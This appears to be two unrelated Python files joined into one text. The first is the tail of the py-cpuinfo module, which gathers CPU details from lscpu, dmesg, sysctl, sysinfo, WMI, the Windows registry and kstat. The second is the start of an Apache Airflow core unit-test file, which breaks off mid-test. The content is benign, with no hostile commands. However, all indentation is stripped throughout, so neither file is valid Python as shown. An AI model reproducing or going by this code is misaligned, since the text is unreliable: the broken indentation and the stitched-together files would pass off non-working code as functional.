brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
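# Illustrative note (not part of the original module): _get_cpu_info_from_lscpu()
# above only reads "Key: value" lines whose keys match the names queried, e.g.
# (values invented for illustration; real lscpu output differs by version/arch):
#
#   Vendor ID:    GenuineIntel
#   Model name:   Intel(R) Core(TM) i7 CPU
#   CPU family:   6
#   Model:        158
#   Stepping:     10
#   CPU max MHz:  4600.0000
#   L1d cache:    32K
#   L2 cache:     256K
#   L3 cache:     12288K
#   Flags:        fpu vme de pse tsc msr ...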
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith('\t') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the output into key/value pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
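# Illustrative note (not part of the original module): the WMIC parser above
# splits the command output into "key=value" pairs, so it assumes list-style
# output in the spirit of the following (values invented for illustration):
#
#   Name=Intel(R) Core(TM) i7 CPU @ 2.60GHz
#   Manufacturer=GenuineIntel
#   CurrentClockSpeed=2600
#   L2CacheSize=1024
#   L3CacheSize=8192
#   Description=Intel64 Family 6 Model 158 Stepping 10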
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = _to_decimal_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
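# Illustrative note (not part of the original module): the kstat parser above
# slices fields out of tab-prefixed "name value" lines as printed by
# `kstat -m cpu_info`, along the lines of (values invented for illustration):
#
#   brand              Intel(r) Xeon(r) CPU
#   vendor_id          GenuineIntel
#   family             6
#   model              158
#   stepping           10
#   clock_MHz          2600
#   current_clock_Hz   2600000000
#
# The flag list is taken from the last line of `isainfo -vb`.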
def _get_cpu_info_from_platform_uname():
try:
uname = DataSource.uname_string_raw.split(',')[0]
family, model, stepping = (None, None, None)
entries = uname.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'family' : family,
'model' : model,
'stepping' : stepping
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
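# Illustrative note (not part of the original module): the platform.uname() based
# fallback above expects a Windows-style processor string such as
# "Intel64 Family 6 Model 158 Stepping 10, GenuineIntel" (example value invented)
# and extracts only the Family/Model/Stepping numbers from it.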
def _get_cpu_info_internal():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'cpuinfo_version_string' : CPUINFO_VERSION_STRING,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'arch_string_raw' : DataSource.arch_string_raw,
}
# Try the Windows wmic
_copy_new_fields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
_copy_new_fields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
_copy_new_fields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
_copy_new_fields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
_copy_new_fields(info, _get_cpu_info_from_lscpu())
# Try sysctl
_copy_new_fields(info, _get_cpu_info_from_sysctl())
# Try kstat
_copy_new_fields(info, _get_cpu_info_from_kstat())
# Try dmesg
_copy_new_fields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
_copy_new_fields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
_copy_new_fields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
_copy_new_fields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
_copy_new_fields(info, _get_cpu_info_from_cpuid())
# Try platform.uname
_copy_new_fields(info, _get_cpu_info_from_platform_uname())
return info
def get_cpu_info_json():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result as a JSON string.
'''
import json
output = None
# If running under pyinstaller, run normally
if getattr(sys, 'frozen', False):
info = _get_cpu_info_internal()
output = json.dumps(info)
output = "{0}".format(output)
# If not running under pyinstaller, run in another process.
# This is done because multiprocessing has a design flaw on Windows that
# causes code outside the __main__ guard to be run multiple times.
else:
from subprocess import Popen, PIPE
command = [sys.executable, __file__, '--json']
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if p1.returncode != 0:
return "{}"
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return output
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns the result as a dict.
'''
import json
output = get_cpu_info_json()
# Convert JSON to Python with non unicode strings
output = json.loads(output, object_hook = _utf_to_str)
return output
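# Minimal usage sketch (assumes this module is importable as `cpuinfo`; most keys
# other than the Python/arch bookkeeping fields are optional and may be absent on
# a given platform, so .get() is used defensively):
#
#   import cpuinfo
#   info = cpuinfo.get_cpu_info()
#   print(info.get('brand_raw'))
#   print(info.get('hz_actual_friendly'))
#   print(info.get('count'), info.get('arch'), info.get('bits'))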
def main():
from argparse import ArgumentParser
import json
# Parse args
parser = ArgumentParser(description='Gets CPU info with pure Python 2 & 3')
parser.add_argument('--json', action='store_true', help='Return the info in JSON format')
parser.add_argument('--version', action='store_true', help='Return the version of py-cpuinfo')
args = parser.parse_args()
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = _get_cpu_info_internal()
if not info:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if args.json:
print(json.dumps(info))
elif args.version:
print(CPUINFO_VERSION_STRING)
else:
print('Python Version: {0}'.format(info.get('python_version', '')))
print('Cpuinfo Version: {0}'.format(info.get('cpuinfo_version_string', '')))
print('Vendor ID Raw: {0}'.format(info.get('vendor_id_raw', '')))
print('Hardware Raw: {0}'.format(info.get('hardware_raw', '')))
print('Brand Raw: {0}'.format(info.get('brand_raw', '')))
print('Hz Advertised Friendly: {0}'.format(info.get('hz_advertised_friendly', '')))
print('Hz Actual Friendly: {0}'.format(info.get('hz_actual_friendly', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Arch String Raw: {0}'.format(info.get('arch_string_raw', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
if __name__ == '__main__':
main()
else:
_check_arch()
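# Command line usage sketch, based on the argparse flags defined in main() above
# (the file name is an assumption; adjust the path to wherever this module lives):
#
#   python cpuinfo.py            # human readable report
#   python cpuinfo.py --json     # the same information as a JSON document
#   python cpuinfo.py --version  # the py-cpuinfo version string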
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, *args, **kwargs):
pass
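# Illustrative note (not part of the test suite): OperatorSubclass exists only so
# the tests below can exercise Jinja templating of `some_templated_field`, e.g.
#
#   t = OperatorSubclass(
#       task_id='templating_demo',            # hypothetical task id
#       some_templated_field='{{ ds }}',      # rendered to the execution date
#       dag=some_dag)                         # `some_dag` is a placeholder DAG
#
# Airflow renders every attribute listed in `template_fields` before execute()
# is called, which is what verify_templated_field() checks in the tests below.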
class CoreTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5,
"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
